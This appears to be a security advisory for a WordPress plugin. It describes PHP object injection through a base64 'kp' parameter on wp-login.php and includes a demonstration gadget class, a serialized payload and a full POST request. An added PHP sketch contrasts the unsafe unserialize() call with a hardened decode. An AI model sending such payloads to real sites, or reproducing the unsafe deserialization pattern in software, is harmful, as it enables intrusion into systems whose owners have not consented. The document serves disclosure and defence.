The plugin passes base64-encoded user input to the PHP unserialize() function when a CAPTCHA is used as the second challenge, which could lead to PHP object injection if a plugin installed on the blog has a suitable gadget chain.
To simulate a gadget chain, put the following code in a plugin:

    class Evil {
        public function __wakeup() : void {
            die("Arbitrary deserialization");
        }
    }

On a page where the request is blocked and the second challenge is set to a CAPTCHA (such as reCAPTCHA), send dummy data, intercept it and change the kp parameter with the following payload: Tzo0OiJFdmlsIjowOnt9Ow== (which is the base64 of O:4:"Evil":0:{};)

    POST /wp-login.php HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 176
    Connection: close
    Upgrade-Insecure-Requests: 1

    kn=6dc52e6b54&ss_block=G&kp=Tzo0OiJFdmlsIjowOnt9Ow%3D%3D&kr=Allow+List+Email%3A+block%40email.com&ka=block%40email.com&ke=cwenf&km=cc&recaptcha=recaptcha&g-recaptcha-response=
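The unsafe pattern described above next to a hardened decode, as an added example that is not the plugin's own code. The function names `decode_kp_unsafe` and `decode_kp_safe` are hypothetical, and the sketch assumes the field only ever needs to carry a flat array of scalar values.

```php
<?php
declare(strict_types=1);

// Stand-in gadget: same idea as the Evil class above, but it records the
// call instead of calling die() so both code paths can be compared.
class Evil {
    public static bool $fired = false;
    public function __wakeup(): void { self::$fired = true; }
}

// Pattern from the description: base64-decoded request data goes straight
// into unserialize(), so any loaded class can be instantiated.
function decode_kp_unsafe(string $kp) {
    return unserialize(base64_decode($kp));
}

// Hardened decode: strict base64, no class instantiation, and a shape check.
function decode_kp_safe(string $kp): ?array {
    $raw = base64_decode($kp, true);          // strict mode rejects non-base64 input
    if ($raw === false) {
        return null;
    }
    // allowed_classes => false turns every serialized object into
    // __PHP_Incomplete_Class, so __wakeup() and __destruct() never run.
    $value = @unserialize($raw, ['allowed_classes' => false]);
    if (!is_array($value)) {
        return null;                          // top-level objects and scalars are refused
    }
    foreach ($value as $item) {
        if ($item !== null && !is_scalar($item)) {
            return null;                      // nested arrays or objects are refused
        }
    }
    return $value;
}

$payload = 'Tzo0OiJFdmlsIjowOnt9Ow==';        // payload quoted on this page
// Constructed benign value for comparison (not taken from the plugin).
$benign = base64_encode(serialize(['email' => 'block@email.com', 'reason' => 'cc']));

var_dump(decode_kp_safe($payload));           // hardened path with the page's payload
var_dump(Evil::$fired);                       // gadget state after the hardened path
decode_kp_unsafe($payload);
var_dump(Evil::$fired);                       // gadget state after the unsafe path
var_dump(decode_kp_safe($benign));            // hardened path with the benign value
```

Where the data does not need PHP's native format at all, replacing `serialize()`/`unserialize()` with `json_encode()`/`json_decode()` removes the object-instantiation path entirely.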
Seryeon Ham
Yes
2022-12-05 (about 9 months ago)